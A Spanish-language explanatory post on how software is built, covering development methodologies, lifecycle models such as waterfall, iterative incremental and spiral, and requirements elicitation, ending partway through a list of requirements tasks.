doc_papa

AQUÍ LES DEJO ALGO SOBRE COMO HACER UN SOFTWARE COMO SE HACE UN SOFTWARE Se define como Proceso al conjunto ordenado de pasos a seguir para llegar a la solución de un problema u obtención de un producto, en este caso particular, para lograr la obtención de un producto software que resuelva un problema. El proceso de creación de software puede llegar a ser muy complejo, dependiendo de su porte, características y criticidad del mismo. Por ejemplo la creación de un sistema operativo es una tarea que requiere proyecto, gestión, numerosos recursos y todo un equipo disciplinado de trabajo. En el otro extremo, si se trata de un sencillo programa (por ejemplo, la resolución de una ecuación de segundo orden), éste puede ser realizado por un solo programador (incluso aficionado) fácilmente. Es así que normalmente se dividen en tres categorías según su tamaño (líneas de código) o costo: de Pequeño, Mediano y Gran porte. Existen varias metodologías para estimarlo, una de las más populares es el sistema COCOMO que provee métodos y un software (programa) que calcula y provee una estimación de todos los costos de producción en un «proyecto software» (relación horas/hombre, costo monetario, cantidad de líneas fuente de acuerdo a lenguaje usado, etc.). Considerando los de gran porte, es necesario realizar complejas tareas, tanto técnicas como de gerencia, una fuerte gestión y análisis diversos (entre otras cosas), por lo cual se ha desarrollado una ingeniería para su estudio y realización: es conocida como Ingeniería de Software. En tanto que en los de mediano porte, pequeños equipos de trabajo (incluso un avezado analista-programador solitario) pueden realizar la tarea. Aunque, siempre en casos de mediano y gran porte (y a veces también en algunos de pequeño porte, según su complejidad), se deben seguir ciertas etapas que son necesarias para la construcción del software. Tales etapas, si bien deben existir, son flexibles en su forma de aplicación, de acuerdo a la metodología o Proceso de Desarrollo escogido y utilizado por el equipo de desarrollo o por el analista-programador solitario (si fuere el caso). Los «procesos de desarrollo de software» poseen reglas preestablecidas, y deben ser aplicados en la creación del software de mediano y gran porte, ya que en caso contrario lo más seguro es que el proyecto o no logre concluir o termine sin cumplir los objetivos previstos, y con variedad de fallos inaceptables (fracasan, en pocas palabras). Entre tales «procesos» los hay ágiles o livianos (ejemplo XP), pesados y lentos (ejemplo RUP) y variantes intermedias; y normalmente se aplican de acuerdo al tipo, porte y tipología del software a desarrollar, a criterio del líder (si lo hay) del equipo de desarrollo. Algunos de esos procesos son Extreme Programming (XP), Rational Unified Process (RUP), Feature Driven Development (FDD), etc. Cualquiera sea el «proceso» utilizado y aplicado al desarrollo del software (RUP, FDD, etc), y casi independientemente de él, siempre se debe aplicar un «modelo de ciclo de vida».6 Se estima que, del total de proyectos software grandes emprendidos, un 28% fracasan, un 46% caen en severas modificaciones que lo retrasan y un 26% son totalmente exitosos. 7 Cuando un proyecto fracasa, rara vez es debido a fallas técnicas, la principal causa de fallos y fracasos es la falta de aplicación de una buena metodología o proceso de desarrollo. Entre otras, una fuerte tendencia, desde hace pocas décadas, es mejorar las metodologías o procesos de desarrollo, o crear nuevas y concientizar a los profesionales en su utilización adecuada. Normalmente los especialistas en el estudio y desarrollo de estas áreas (metodologías) y afines (tales como modelos y hasta la gestión misma de los proyectos) son los Ingenieros en Software, es su orientación. Los especialistas en cualquier otra área de desarrollo informático (analista, programador, Lic. en Informática, Ingeniero en Informática, Ingeniero de Sistemas, etc.) normalmente aplican sus conocimientos especializados pero utilizando modelos, paradigmas y procesos ya elaborados. Es común para el desarrollo de software de mediano porte que los equipos humanos involucrados apliquen sus propias metodologías, normalmente un híbrido de los procesos anteriores y a veces con criterios propios. El proceso de desarrollo puede involucrar numerosas y variadas tareas6 , desde lo administrativo, pasando por lo técnico y hasta la gestión y el gerenciamiento. Pero casi rigurosamente siempre se cumplen ciertas etapas mínimas; las que se pueden resumir como sigue: • Captura, Elicitación8 , Especificación y Análisis de requisitos (ERS) • Diseño • Codificación • Pruebas (unitarias y de integración) • Instalación y paso a Producción • Mantenimiento En las anteriores etapas pueden variar ligeramente sus nombres, o ser más globales, o contrariamente, ser más refinadas; por ejemplo indicar como una única fase (a los fines documentales e interpretativos) de «análisis y diseño»; o indicar como «implementación» lo que está dicho como «codificación»; pero en rigor, todas existen e incluyen, básicamente, las mismas tareas específicas. En el apartado 4 del presente artículo se brindan mayores detalles de cada una de las listadas etapas. Modelos de proceso o ciclo de vida Para cada una de las fases o etapas listadas en el ítem anterior, existen sub-etapas (o tareas). El modelo de proceso o modelo de ciclo de vida utilizado para el desarrollo define el orden para las tareas o actividades involucradas6 también definen la coordinación entre ellas, enlace y realimentación entre las mencionadas etapas. Entre los más conocidos se puede mencionar: modelo en cascada o secuencial, modelo espiral, modelo iterativo incremental. De los antedichos hay a su vez algunas variantes o alternativas, más o menos atractivas según sea la aplicación requerida y sus requisitos.7 Modelo cascada Este, aunque es más comúnmente conocido como modelo en cascada es también llamado «modelo clásico», «modelo tradicional» o «modelo lineal secuencial». El modelo en cascada puro difícilmente se utilice tal cual, pues esto implicaría un previo y absoluto conocimiento de los requisitos, la no volatilidad de los mismos (o rigidez) y etapas subsiguientes libres de errores; ello sólo podría ser aplicable a escasos y pequeños desarrollos de sistemas. En estas circunstancias, el paso de una etapa a otra de las mencionadas sería sin retorno, por ejemplo pasar del Diseño a la Codificación implicaría un diseño exacto y sin errores ni probable modificación o evolución: «codifique lo diseñado que no habrán en absoluto variantes ni errores». Esto es utópico; ya que intrínsecamente el software es de carácter evolutivo, cambiante y difícilmente libre de errores, tanto durante su desarrollo como durante su vida operativa.6 Fig. 2 - Modelo cascada puro o secuencial para el ciclo de vida del software. Algún cambio durante la ejecución de una cualquiera de las etapas en este modelo secuencial implicaría reiniciar desde el principio todo el ciclo completo, lo cual redundaría en altos costos de tiempo y desarrollo. La figura 2 muestra un posible esquema de el modelo en cuestión.6 Sin embargo, el modelo cascada en algunas de sus variantes es uno de los actualmente más utilizados9 , por su eficacia y simplicidad, más que nada en software de pequeño y algunos de mediano porte; pero nunca (o muy rara vez) se lo usa en su forma pura, como se dijo anteriormente. En lugar de ello, siempre se produce alguna realimentación entre etapas, que no es completamente predecible ni rígida; esto da oportunidad al desarrollo de productos software en los cuales hay ciertas incertezas, cambios o evoluciones durante el ciclo de vida. Así por ejemplo, una vez capturados (elicitados) y especificados los requisitos (primera etapa) se puede pasar al diseño del sistema, pero durante esta última fase lo más probable es que se deban realizar ajustes en los requisitos (aunque sean mínimos), ya sea por fallas detectadas, ambigüedades o bien por que los propios requisitos han cambiado o evolucionado; con lo cual se debe retornar a la primera o previa etapa, hacer los pertinentes reajustes y luego continuar nuevamente con el diseño; esto último se conoce como realimentación. Lo normal en el modelo cascada será entonces la aplicación del mismo con sus etapas realimentadas de alguna forma, permitiendo retroceder de una a la anterior (e incluso poder saltar a varias anteriores) si es requerido. De esta manera se obtiene un «modelo cascada realimentado», que puede ser esquematizado como lo ilustra la figura 3. Fig. 3 - Modelo cascada realimentado para el ciclo de vida. Lo dicho es, a grandes rasgos, la forma y utilización de este modelo, uno de los más usados y populares.6 El modelo Cascada Realimentado resulta muy atractivo, hasta ideal, si el proyecto presenta alta rigidez (pocos o ningún cambio, no evolutivo), los requisitos son muy claros y están correctamente especificados.9 Hay más variantes similares al modelo: refino de etapas (más etapas, menores y más específicas) o incluso mostrar menos etapas de las indicadas, aunque en tal caso la faltante estará dentro de alguna otra. El orden de esas fases indicadas en el ítem previo es el lógico y adecuado, pero adviértase, como se dijo, que normalmente habrá realimentación hacia atrás. El modelo lineal o en cascada es el paradigma más antiguo y extensamente utilizado, sin embargo las críticas a él (ver desventajas) han puesto en duda su eficacia. Pese a todo, tiene un lugar muy importante en la Ingeniería de software y continúa siendo el más utilizado; y siempre es mejor que un enfoque al azar.9 Desventajas del modelo cascada:6 • Los cambios introducidos durante el desarrollo pueden confundir al equipo profesional en las etapas tempranas del proyecto. Si los cambios se producen en etapa madura (codificación o prueba) pueden ser catastróficos para un proyecto grande. • No es frecuente que el cliente o usuario final explicite clara y completamente los requisitos (etapa de inicio); y el modelo lineal lo requiere. La incertidumbre natural en los comienzos es luego difícil de acomodar.9 • El cliente debe tener paciencia ya que el software no estará disponible hasta muy avanzado el proyecto. Un error detectado por el cliente (en fase de operación) puede ser desastroso, implicando reinicio del proyecto, con altos costos. Modelos evolutivos El software evoluciona con el tiempo. Los requisitos del usuario y del producto suelen cambiar conforme se desarrolla el mismo. Las fechas de mercado y la competencia hacen que no sea posible esperar a poner en el mercado un producto absolutamente completo, por lo que se debe introducir una versión funcional limitada de alguna forma para aliviar las presiones competitivas. En esas u otras situaciones similares los desarrolladores necesitan modelos de progreso que estén diseñados para acomodarse a una evolución temporal o progresiva, donde los requisitos centrales son conocidos de antemano, aunque no estén bien definidos a nivel detalle. En el modelo Cascada y Cascada Realimentado no se tiene en cuenta la naturaleza evolutiva del software, se plantea como estático con requisitos bien conocidos y definidos desde el inicio.6 Los evolutivos son modelos iterativos, permiten desarrollar versiones cada vez más completas y complejas, hasta llegar al objetivo final deseado; incluso evolucionar más allá, durante la fase de operación. Los modelos «iterativo incremental» y «espiral» (entre otros) son dos de los más conocidos y utilizados del tipo evolutivo.9 Modelo iterativo incremental En términos generales, podemos distinguir, en la figura 4, los pasos generales que sigue el proceso de desarrollo de un producto software. En el modelo de ciclo de vida seleccionado, se identifican claramente dichos pasos. La Descripción del Sistema es esencial para especificar y confeccionar los distintos incrementos hasta llegar al Producto global y final. Las actividades concurrentes (Especificación, Desarrollo y Validación) sintetizan el desarrollo pormenorizado de los incrementos, que se hará posteriormente. Fig. 4 - Diagrama genérico del desarrollo evolutivo incremental. El diagrama 4 nos muestra en forma muy esquemática, el funcionamiento de un ciclo iterativo incremental, el cual permite la entrega de versiones parciales a medida que se va construyendo el producto final.6 Es decir, a medida que cada incremento definido llega a su etapa de operación y mantenimiento. Cada versión emitida incorpora a los anteriores incrementos las funcionalidades y requisitos que fueron analizados como necesarios. El incremental es un modelo de tipo evolutivo que está basado en varios ciclos Cascada realimentados aplicados repetidamente, con una filosofía iterativa.9 En la figura 5 se muestra un refino del diagrama previo, bajo un esquema temporal, para obtener finalmente el esquema del Modelo de ciclo de vida Iterativo Incremental, con sus actividades genéricas asociadas. Aquí se observa claramente cada ciclo cascada que es aplicado para la obtención de un incremento; estos últimos se van integrando para obtener el producto final completo. Cada incremento es un ciclo Cascada Realimentado, aunque, por simplicidad, en la figura 5 se muestra como secuencial puro. Fig. 5 - Modelo iterativo incremental para el ciclo de vida del software,. Se observa que existen actividades de desarrollo (para cada incremento) que son realizadas en paralelo o concurrentemente, así por ejemplo, en la figura, mientras se realiza el diseño detalle del primer incremento ya se está realizando en análisis del segundo. La figura 5 es sólo esquemática, un incremento no necesariamente se iniciará durante la fase de diseño del anterior, puede ser posterior (incluso antes), en cualquier tiempo de la etapa previa. Cada incremento concluye con la actividad de «operación y mantenimiento» (indicada «Operación» en la figura), que es donde se produce la entrega del producto parcial al cliente. El momento de inicio de cada incremento es dependiente de varios factores: tipo de sistema; independencia o dependencia entre incrementos (dos de ellos totalmente independientes pueden ser fácilmente iniciados al mismo tiempo si se dispone de personal suficiente); capacidad y cantidad de profesionales involucrados en el desarrollo; etc. Bajo este modelo se entrega software «por partes funcionales más pequeñas», pero reutilizables, llamadas incrementos. En general cada incremento se construye sobre aquel que ya fue entregado.6 Como se muestra en la figura 5, se aplican secuencias Cascada en forma escalonada, mientras progresa el tiempo calendario. Cada secuencia lineal o Cascada produce un incremento y a menudo el primer incremento es un sistema básico, con muchas funciones suplementarias (conocidas o no) sin entregar. El cliente utiliza inicialmente ese sistema básico intertanto, el resultado de su uso y evaluación puede aportar al plan para el desarrollo del/los siguientes incrementos (o versiones). Además también aportan a ese plan otros factores, como lo es la priorización (mayor o menor urgencia en la necesidad de cada incremento) y la dependencia entre incrementos (o independencia). Luego de cada integración se entrega un producto con mayor funcionalidad que el previo. El proceso se repite hasta alcanzar el software final completo. Siendo iterativo, con el modelo incremental se entrega un producto parcial pero completamente operacional en cada incremento, y no una parte que sea usada para reajustar los requerimientos (como si ocurre en el modelo de construcción de prototipos).9 El enfoque incremental resulta muy útil con baja dotación de personal para el desarrollo; también si no hay disponible fecha límite del proyecto por lo que se entregan versiones incompletas pero que proporcionan al usuario funcionalidad básica (y cada vez mayor). También es un modelo útil a los fines de evaluación. Nota: Puede ser considerado y útil, en cualquier momento o incremento incorporar temporalmente el paradigma MCP como complemento, teniendo así una mixtura de modelos que mejoran el esquema y desarrollo general. Ejemplo: Un procesador de texto que sea desarrollado bajo el paradigma Incremental podría aportar, en principio, funciones básicas de edición de archivos y producción de documentos (algo como un editor simple). En un segundo incremento se le podría agregar edición más sofisticada, y de generación y mezcla de documentos. En un tercer incremento podría considerarse el agregado de funciones de corrección ortográfica, esquemas de paginado y plantillas; en un cuarto capacidades de dibujo propias y ecuaciones matemáticas. Así sucesivamente hasta llegar al procesador final requerido. Así, el producto va creciendo, acercándose a su meta final, pero desde la entrega del primer incremento ya es útil y funcional para el cliente, el cual observa una respuesta rápida en cuanto a entrega temprana; sin notar que la fecha límite del proyecto puede no estar acotada ni tan definida, lo que da margen de operación y alivia presiones al equipo de desarrollo. Como se dijo, el Iterativo Incremental es un modelo del tipo evolutivo, es decir donde se permiten y esperan probables cambios en los requisitos en tiempo de desarrollo; se admite cierto margen para que el software pueda evolucionar. Aplicable cuando los requisitos son medianamente bien conocidos pero no son completamente estáticos y definidos, cuestión esa que si es indispensable para poder utilizar un modelo Cascada. El modelo es aconsejable para el desarrollo de software en el cual se observe, en su etapa inicial de análisis, que posee áreas bastante bien definidas a cubrir, con suficiente independencia como para ser desarrolladas en etapas sucesivas. Tales áreas a cubrir suelen tener distintos grados de apremio por lo cual las mismas se deben priorizar en un análisis previo, es decir, definir cual será la primera, la segunda, y así sucesivamente; esto se conoce como «definición de los incrementos» con base en priorización. Pueden no existir prioridades funcionales por parte del cliente, pero el desarrollador debe fijarlas de todos modos y con algún criterio, ya que basándose en ellas se desarrollarán y entregarán los distintos incrementos. El hecho de que existan incrementos funcionales del software lleva inmediatamente a pensar en un esquema de desarrollo modular, por tanto este modelo facilita tal paradigma de diseño. En resumen, un modelo incremental lleva a pensar en un desarrollo modular, con entregas parciales del producto software denominados «incrementos» del sistema, que son escogidos según prioridades predefinidas de algún modo. El modelo permite una implementación con refinamientos sucesivos (ampliación o mejora). Con cada incremento se agrega nueva funcionalidad o se cubren nuevos requisitos o bien se mejora la versión previamente implementada del producto software. Este modelo brinda cierta flexibilidad para que durante el desarrollo se incluyan cambios en los requisitos por parte del usuario, un cambio de requisitos propuesto y aprobado puede analizarse e implementarse como un nuevo incremento o, eventualmente, podrá constituir una mejora/adecuación de uno ya planeado. Aunque si se produce un cambio de requisitos por parte del cliente que afecte incrementos previos ya terminados (detección/incorporación tardía) se debe evaluar la factibilidad y realizar un acuerdo con el cliente, ya que puede impactar fuertemente en los costos. La selección de este modelo permite realizar entregas funcionales tempranas al cliente (lo cual es beneficioso tanto para él como para el grupo de desarrollo). Se priorizan las entregas de aquellos módulos o incrementos en que surja la necesidad operativa de hacerlo, por ejemplo para cargas previas de información, indispensable para los incrementos siguientes.9 El modelo iterativo incremental no obliga a especificar con precisión y detalle absolutamente todo lo que el sistema debe hacer, (y cómo), antes de ser construido (como el caso del cascada, con requisitos congelados). Sólo se hace en el incremento en desarrollo. Esto torna más manejable el proceso y reduce el impacto en los costos. Esto es así, porque en caso de alterar o rehacer los requisitos, solo afecta una parte del sistema. Aunque, lógicamente, esta situación se agrava si se presenta en estado avanzado, es decir en los últimos incrementos. En definitiva, el modelo facilita la incorporación de nuevos requisitos durante el desarrollo. Con un paradigma incremental se reduce el tiempo de desarrollo inicial, ya que se implementa funcionalidad parcial. También provee un impacto ventajoso frente al cliente, que es la entrega temprana de partes operativas del software. El modelo proporciona todas las ventajas del modelo en cascada realimentado, reduciendo sus desventajas sólo al ámbito de cada incremento. El modelo incremental no es recomendable para casos de sistemas de tiempo real, de alto nivel de seguridad, de procesamiento distribuido, o de alto índice de riesgos. Modelo espiral El modelo espiral fue propuesto inicialmente por Barry Boehm. Es un modelo evolutivo que conjuga la naturaleza iterativa del modelo MCP con los aspectos controlados y sistemáticos del Modelo Cascada. Proporciona potencial para desarrollo rápido de versiones incrementales. En el modelo Espiral el software se construye en una serie de versiones incrementales. En las primeras iteraciones la versión incremental podría ser un modelo en papel o bien un prototipo. En las últimas iteraciones se producen versiones cada vez más completas del sistema diseñado.6 9 El modelo se divide en un número de Actividades de marco de trabajo, llamadas «regiones de tareas». En general existen entre tres y seis regiones de tareas (hay variantes del modelo). En la figura 6 se muestra el esquema de un Modelo Espiral con 6 regiones. En este caso se explica una variante del modelo original de Boehm, expuesto en su tratado de 1988; en 1998 expuso un tratado más reciente. Fig. 6 - Modelo espiral para el ciclo de vida del software. Las regiones definidas en el modelo de la figura son: • Región 1 - Tareas requeridas para establecer la comunicación entre el cliente y el desarrollador. • Región 2 - Tareas inherentes a la definición de los recursos, tiempo y otra información relacionada con el proyecto. • Región 3 - Tareas necesarias para evaluar los riesgos técnicos y de gestión del proyecto. • Región 4 - Tareas para construir una o más representaciones de la aplicación software. • Región 5 - Tareas para construir la aplicación, instalarla, probarla y proporcionar soporte al usuario o cliente (Ej. documentación y práctica). • Región 6 - Tareas para obtener la reacción del cliente, según la evaluación de lo creado e instalado en los ciclos anteriores. Las actividades enunciadas para el marco de trabajo son generales y se aplican a cualquier proyecto, grande, mediano o pequeño, complejo o no. Las regiones que definen esas actividades comprenden un «conjunto de tareas» del trabajo: ese conjunto sí se debe adaptar a las características del proyecto en particular a emprender. Nótese que lo listado en los ítems de 1 a 6 son conjuntos de tareas, algunas de las ellas normalmente dependen del proyecto o desarrollo en si. Proyectos pequeños requieren baja cantidad de tareas y también de formalidad. En proyectos mayores o críticos cada región de tareas contiene labores de más alto nivel de formalidad. En cualquier caso se aplican actividades de protección (por ejemplo, gestión de configuración del software, garantía de calidad, etc.). Al inicio del ciclo, o proceso evolutivo, el equipo de ingeniería gira alrededor del espiral (metafóricamente hablando) comenzando por el centro (marcado con ๑ en la figura 6) y en el sentido indicado; el primer circuito de la espiral puede producir el desarrollo de una especificación del producto; los pasos siguientes podrían generar un prototipo y progresivamente versiones más sofisticadas del software. Cada paso por la región de planificación provoca ajustes en el plan del proyecto; el coste y planificación se realimentan en función de la evaluación del cliente. El gestor de proyectos debe ajustar el número de iteraciones requeridas para completar el desarrollo. El modelo espiral puede ir adaptándose y aplicarse a lo largo de todo el Ciclo de vida del software (en el modelo clásico, o cascada, el proceso termina a la entrega del software). Una visión alternativa del modelo puede observarse examinando el «eje de punto de entrada de proyectos». Cada uno de los circulitos (๏) fijados a lo largo del eje representan puntos de arranque de los distintos proyectos (relacionados); a saber: • Un proyecto de «desarrollo de conceptos» comienza al inicio de la espiral, hace múltiples iteraciones hasta que se completa, es la zona marcada con verde. • Si lo anterior se va a desarrollar como producto real, se inicia otro proyecto: «Desarrollo de nuevo Producto». Que evolucionará con iteraciones hasta culminar; es la zona marcada en color azul. • Eventual y análogamente se generarán proyectos de «mejoras de productos» y de «mantenimiento de productos», con las iteraciones necesarias en cada área (zonas roja y gris, respectivamente). Cuando la espiral se caracteriza de esta forma, está operativa hasta que el software se retira, eventualmente puede estar inactiva (el proceso), pero cuando se produce un cambio el proceso arranca nuevamente en el punto de entrada apropiado (por ejemplo, en «mejora del producto»). El modelo espiral da un enfoque realista, que evoluciona igual que el software; se adapta muy bien para desarrollos a gran escala. El Espiral utiliza el MCP para reducir riesgos y permite aplicarlo en cualquier etapa de la evolución. Mantiene el enfoque clásico (cascada) pero incorpora un marco de trabajo iterativo que refleja mejor la realidad. Este modelo requiere considerar riesgos técnicos en todas las etapas del proyecto; aplicado adecuadamente debe reducirlos antes de que sean un verdadero problema. El Modelo evolutivo como el Espiral es particularmente apto para el desarrollo de Sistemas Operativos (complejos); también en sistemas de altos riesgos o críticos (Ej. navegadores y controladores aeronáuticos) y en todos aquellos en que sea necesaria una fuerte gestión del proyecto y sus riesgos, técnicos o de gestión. Desventajas importantes: • Requiere mucha experiencia y habilidad para la evaluación de los riesgos, lo cual es requisito para el éxito del proyecto. • Es difícil convencer a los grandes clientes que se podrá controlar este enfoque evolutivo. Este modelo no se ha usado tanto, como el Cascada (Incremental) o MCP, por lo que no se tiene bien medida su eficacia, es un paradigma relativamente nuevo y difícil de implementar y controlar. Modelo espiral Win & Win Una variante interesante del Modelo Espiral previamente visto (Fig. 6) es el «Modelo espiral Win-Win»7 (Barry Boehm). El Modelo Espiral previo (clásico) sugiere la comunicación con el cliente para fijar los requisitos, en que simplemente se pregunta al cliente qué necesita y él proporciona la información para continuar; pero esto es en un contexto ideal que rara vez ocurre. Normalmente cliente y desarrollador entran en una negociación, se negocia coste frente a funcionalidad, rendimiento, calidad, etc. «Es así que la obtención de requisitos requiere una negociación, que tiene éxito cuando ambas partes ganan». Las mejores negociaciones se fuerzan en obtener «Victoria & Victoria» (Win & Win), es decir que el cliente gane obteniendo el producto que lo satisfaga, y el desarrollador también gane consiguiendo presupuesto y fecha de entrega realista. Evidentemente, este modelo requiere fuertes habilidades de negociación. El modelo Win-Win define un conjunto de actividades de negociación al principio de cada paso alrededor de la espiral; se definen las siguientes actividades: 1. Identificación del sistema o subsistemas clave de los directivos(*) (saber qué quieren). 2. Determinación de «condiciones de victoria» de los directivos (saber qué necesitan y los satisface) 3. Negociación de las condiciones «victoria» de los directivos para obtener condiciones «Victoria & Victoria» (negociar para que ambos ganen). (*) Directivo: Cliente escogido con interés directo en el producto, que puede ser premiado por la organización si tiene éxito o criticado si no. El modelo Win & Win hace énfasis en la negociación inicial, también introduce 3 hitos en el proceso llamados «puntos de fijación», que ayudan a establecer la completitud de un ciclo de la espiral, y proporcionan hitos de decisión antes de continuar el proyecto de desarrollo del software. Etapas en el desarrollo del software Captura, análisis y especificación de requisitos Al inicio de un desarrollo (no de un proyecto), esta es la primera fase que se realiza, y, según el modelo de proceso adoptado, puede casi terminar para pasar a la próxima etapa (caso de Modelo Cascada Realimentado) o puede hacerse parcialmente para luego retomarla (caso Modelo Iterativo Incremental u otros de carácter evolutivo). En simple palabras y básicamente, durante esta fase, se adquieren, reúnen y especifican las características funcionales y no funcionales que deberá cumplir el futuro programa o sistema a desarrollar. Las bondades de las características, tanto del sistema o programa a desarrollar, como de su entorno, parámetros no funcionales y arquitectura dependen enormemente de lo bien lograda que esté esta etapa. Esta es, probablemente, la de mayor importancia y una de las fases más difíciles de lograr certeramente, pues no es automatizable, no es muy técnica y depende en gran medida de la habilidad y experiencia del analista que la realice. Involucra fuertemente al usuario o cliente del sistema, por tanto tiene matices muy subjetivos y es difícil de modelar con certeza o aplicar una técnica que sea «la más cercana a la adecuada» (de hecho no existe «la estrictamente adecuada»). Si bien se han ideado varias metodologías, incluso software de apoyo, para captura, elicitación y registro de requisitos, no existe una forma infalible o absolutamente confiable, y deben aplicarse conjuntamente buenos criterios y mucho sentido común por parte del o los analistas encargados de la tarea; es fundamental también lograr una fluida y adecuada comunicación y comprensión con el usuario final o cliente del sistema. El artefacto más importante resultado de la culminación de esta etapa es lo que se conoce como especificación de requisitos software o simplemente documento ERS. Como se dijo, la habilidad del analista para interactuar con el cliente es fundamental; lo común es que el cliente tenga un objetivo general o problema que resolver, no conoce en absoluto el área (informática), ni su jerga, ni siquiera sabe con precisión qué debería hacer el producto software (qué y cuantas funciones) ni, mucho menos, cómo debe operar. En otros casos menos frecuentes, el cliente «piensa» que sabe precisamente lo que el software tiene que hacer, y generalmente acierta muy parcialmente, pero su empecinamiento entorpece la tarea de elicitación. El analista debe tener la capacidad para lidiar con este tipo de problemas, que incluyen relaciones humanas; tiene que saber ponerse al nivel del usuario para permitir una adecuada comunicación y comprensión. Escasas son las situaciones en que el cliente sabe con certeza e incluso con completitud lo que requiere de su futuro sistema, este es el caso más sencillo para el analista. Las tareas relativas a captura, elicitación, modelado y registro de requerimientos, además de ser sumamente importante, puede llegar a ser dificultosa de lograr acertadamente y llevar bastante tiempo relativo al proceso total del desarrollo; al proceso y metodologías para llevar a cabo este conjunto de actividades normalmente se las asume parte propia de la Ingeniería de Software, pero dada la antedicha complejidad, actualmente se habla de una Ingeniería en Requisitos10 , aunque ella aún no existe formalmente. Hay grupos de estudio e investigación, en todo el mundo, que están exclusivamente abocados a la idear modelos, técnicas y procesos para intentar lograr la correcta captura, análisis y registro de requerimientos. Estos grupos son los que normalmente hablan de la Ingeniería en Requisitos; es decir se plantea ésta como un área o disciplina pero no como una carrera universitaria en si misma. Algunos requisitos no necesitan la presencia del cliente, para ser capturados o analizados; en ciertos casos los puede proponer el mismo analista o, incluso, adoptar unilateralmente decisiones que considera adecuadas (tanto en requerimientos funcionales como no funcionales). Por citar ejemplos probables: Algunos requisitos sobre la arquitectura del sistema, requisitos no funcionales tales como los relativos al rendimiento, nivel de soporte a errores operativos, plataformas de desarrollo, relaciones internas o ligas entre la información (entre registros o tablas de datos) a almacenar en caso de bases o bancos de datos, etc. Algunos funcionales tales como opciones secundarias o de soporte necesarias para una mejor o más sencilla operatividad; etc. La obtención de especificaciones a partir del cliente (u otros actores intervinientes) es un proceso humano muy interactivo e iterativo; normalmente a medida que se captura la información, se la analiza y realimenta con el cliente, refinándola, puliéndola y corrigiendo si es necesario; cualquiera sea el método de ERS utilizado. EL analista siempre debe llegar a conocer la temática y el problema que resolver, dominarlo, hasta cierto punto, hasta el ámbito que el futuro sistema a desarrollar lo abarque. Por ello el analista debe tener alta capacidad para comprender problemas de muy diversas áreas o disciplinas de trabajo (que no son específicamente suyas); así por ejemplo, si el sistema a desarrollar será para gestionar información de una aseguradora y sus sucursales remotas, el analista se debe compenetrar en cómo ella trabaja y maneja su información, desde niveles muy bajos e incluso llegando hasta los gerenciales. Dada a gran diversidad de campos a cubrir, los analistas suelen ser asistidos por especialistas, es decir gente que conoce profundamente el área para la cual se desarrollará el software; evidentemente una única persona (el analista) no puede abarcar tan vasta cantidad de áreas del conocimiento. En empresas grandes de desarrollo de productos software, es común tener analistas especializados en ciertas áreas de trabajo. Contrariamente, no es problema del cliente, es decir él no tiene por qué saber nada de software, ni de diseños, ni otras cosas relacionadas; sólo se debe limitar a aportar objetivos, datos e información (de mano propia o de sus registros, equipos, empleados, etc) al analista, y guiado por él, para que, en primera instancia, defina el «Universo de Discurso», y con posterior trabajo logre confeccionar el adecuado documento ERS. Es bien conocida la presión que sufren los desarrolladores de sistemas informáticos para comprender y rescatar las necesidades de los clientes/usuarios. Cuanto más complejo es el contexto del problema más difícil es lograrlo, a veces se fuerza a los desarrolladores a tener que convertirse en casi expertos de los dominios que analizan. Cuando esto no sucede es muy probable que se genere un conjunto de requisitos11 erróneos o incompletos y por lo tanto un producto de software con alto grado de desaprobación por parte de los clientes/usuarios y un altísimo costo de reingeniería y mantenimiento. Todo aquello que no se detecte, o resulte mal entendido en la etapa inicial provocará un fuerte impacto negativo en los requisitos, propagando esta corriente degradante a lo largo de todo el proceso de desarrollo e incrementando su perjuicio cuanto más tardía sea su detección (Bell y Thayer 1976)(Davis 1993). Procesos, modelado y formas de elicitación de requisitos Siendo que la captura, elicitación y especificación de requisitos, es una parte crucial en el proceso de desarrollo de software, ya que de esta etapa depende el logro de los objetivos finales previstos, se han ideado modelos y diversas metodologías de trabajo para estos fines. También existen herramientas software que apoyan las tareas relativas realizadas por el ingeniero en requisitos. El estándar IEEE 830-1998 brinda una normalización de las «Prácticas Recomendadas para la Especificación de Requisitos Software».12 A medida que se obtienen los requisitos, normalmente se los va analizando, el resultado de este análisis, con o sin el cliente, se plasma en un documento, conocido como ERS o Especificación de Requisitos Software, cuya estructura puede venir definida por varios estándares, tales como CMM-I. Un primer paso para realizar el relevamiento de información es el conocimiento y definición acertada lo que se conoce como «Universo de Discurso» del problema, que se define y entiende por: Universo de Discurso (UdeD): es el contexto general en el cual el software deberá ser desarrollado y deberá operar. El UdeD incluye todas las fuentes de información y todas las personas relacionadas con el software. Esas personas son conocidas también como actores de ese universo. El UdeD es la realidad circunstanciada por el conjunto de objetivos definidos por quienes demandaron el software. A partir de la extracción y análisis de información en su ámbito se obtienen todas las especificaciones necesarias y tipos de requisitos para el futuro producto software. El objetivo de la Ingeniería de Requisitos (IR) es sistematizar el proceso de definición de requisitos permitiendo elicitar, modelar y analizar el problema, generando un compromiso entre los Ingenieros de Requisitos y los clientes/usuarios, ya que ambos participan en la generación y definición de los requisitos del sistema. La IR aporta un conjunto de métodos, técnicas y herramientas que asisten a los ingenieros de requisitos (analistas) para obtener requerimientos lo más seguros, veraces, completos y oportunos posibles, permitiendo básicamente: • Comprender el problema • Facilitar la obtención de las necesidades del cliente/usuario • Validar con el cliente/usuario • Garantizar las especificaciones de requisitos Si bien existen diversas formas, modelos y metodologías para elicitar, definir y documentar requerimientos, no se puede decir que alguna de ellas sea mejor o peor que la otra, suelen tener muchísimo en común, y todas cumplen el mismo objetivo. Sin embargo, lo que si se puede decir sin dudas es que es indispensable utilizar alguna de ellas para documentar las especificaciones del futuro producto software. Así por ejemplo, hay un grupo de investigación argentino que desde hace varios años ha propuesto y estudia el uso del LEL (Léxico Extendido del Lenguaje) y Escenarios como metodología, aquí13 se presenta una de las tantas referencias y bibliografía sobre ello. Otra forma, más ortodoxa, de capturar y documentar requisitos se puede obtener en detalle, por ejemplo, en el trabajo de la Universidad de Sevilla sobre «Metodología para el Análisis de Requisitos de Sistemas Software».14 En la Fig. 7 se muestra un esquema, más o menos riguroso, aunque no detallado, de los pasos y tareas a seguir para realizar la captura, análisis y especificación de requerimientos software. También allí se observa qué artefacto o documento se obtiene en cada etapa del proceso. En el diagrama no se explicita metodología o modelo a utilizar, sencillamente se pautan las tareas que deben cumplirse, de alguna manera. Fig. 7 - Diagrama de tareas para captura y análisis de requisitos. Una posible lista, general y ordenada, de tareas recomendadas para obtener la definición de lo que se debe realizar, los productos a obtener y las técnicas a emplear durante la actividad de elicitación de requisitos, en fase de Especificación de Requisitos Software es: 1. Obtener información sobre el dominio del problema y el sistema actual 